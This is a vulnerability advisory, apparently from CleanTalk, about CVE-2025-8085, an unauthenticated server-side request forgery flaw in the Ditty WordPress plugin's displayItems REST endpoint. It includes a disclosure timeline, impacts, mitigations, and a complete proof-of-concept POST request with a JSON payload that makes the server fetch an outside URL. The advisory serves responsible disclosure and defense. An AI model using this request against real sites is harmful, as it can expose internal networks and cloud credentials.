Ditty is a popular WordPress plugin for creating dynamic content displays—tickers, charts, and news feeds—through a user-friendly block editor interface. With over 50,000 active installations, it’s widely used to embed real-time data and media into pages and posts. However, a critical vulnerability—CVE-2025-8085—has been identified in its REST API: an unauthenticated Server-Side Request Forgery (SSRF) flaw in the endpoint wp-json/dittyeditor/v1/displayItems. This allows any unauthenticated visitor to coerce the server into fetching arbitrary external or internal URLs, potentially exposing internal network resources or enabling further exploits like remote code execution or data exfiltration.
| CVE | CVE-2025-8085 |
| Plugin Version | Ditty < 3.1.58 |
| Critical | High |
| All Time | 2 647 703 |
| Active installations | 50 000+ |
| Publicly Published | August 25, 2025 |
| Last Updated | August 25, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8085 https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| July 2, 2025 | Plugin testing and vulnerability detection in the Ditty – Responsive News Tickers, Sliders, and Lists have been completed |
| July 2, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 25, 2025 | Registered CVE-2025-8085 |
Discovery of the Vulnerability
During a security assessment of Ditty’s API, researchers discovered that the displayItems route accepted user-supplied HTML attributes—including image sources—without validating or restricting the target domains. Specifically, a crafted JSON payload with "html": "{image default_src=\"https://webhoo12312312k.site/...\"}" instructs the server to fetch the specified URL. Because the endpoint is publicly accessible and does not require authentication or origin checks, attackers can direct the server to any internal or external endpoint, leading to SSRF.
Understanding of SSRF attack’s
Server-Side Request Forgery (SSRF) occurs when a web application fetches a URL based on user input. In WordPress, SSRF vulnerabilities have been observed in plugins that proxy external resources—such as image optimization services or remote content preview features—without proper whitelist or validation. CVE-2025-8085 in Ditty follows this pattern, exposing internal administration interfaces (e.g., http://localhost:22/) or cloud metadata endpoints (e.g., AWS IAM metadata) to attackers, enabling information disclosure or pivoting to remote code execution.
Exploiting the SSRF Vulnerability
To exploit CVE-2025-8085, an attacker without auth. user Cookies:
POC:
POST /wordpress/index.php/wp-json/dittyeditor/v1/displayItems HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/plugins.php Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 436 Origin: http://127.0.0.1 Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin { "apiData": { "layouts": [ { "id": "ssrf_layout", "html": "{image default_src=\"https://webhoo12312312k.site/3aa51640-4d0f-4fa0-a724-0eeb3d5bbd49\"}", "css": "" } ], "items": [ { "item_id": "1", "item_type": "default", "item_value": { "content": "SSRF demo" }, "layout_value": { "default": "ssrf_layout" } } ] } }____
SSRF in a WordPress plugin as widely installed as Ditty poses severe risks. In shared-hosting environments or cloud deployments, attackers can exploit CVE-2025-8085 to:
- Access internal network services (databases, admin panels) by scanning private IP ranges, leading to lateral movement.
- Retrieve cloud metadata (e.g., AWS IAM credentials), escalating to full cloud account compromise.
- Bypass firewall policies, performing port scans or injecting malicious payloads into trusted internal applications.
Large enterprises using Ditty for dynamic dashboards or data integrations face potential data breaches, infrastructure downtime, and reputational damage.
Recommendations for Improved Security
To mitigate CVE-2025-8085 and prevent SSRF attacks:
- Implement URL Whitelisting: Restrict external fetches to approved domains or subnets, rejecting any others.
- Validate User Input: Sanitize and parse HTML attributes, disallowing
http://,https://, or redirect patterns in untrusted contexts. - Require Authentication: Protect sensitive API routes with capability checks, ensuring only authenticated users can render dynamic layouts.
- Use a WAF: Deploy a Web Application Firewall to block SSRF patterns and monitor outbound requests from the application.
- Audit Plugin Code: Review all endpoints that perform server-side fetches, ensuring each implements robust validation and error handling.
By taking proactive measures to address SSRF vulnerabilities like CVE-2025-8085 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #SSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.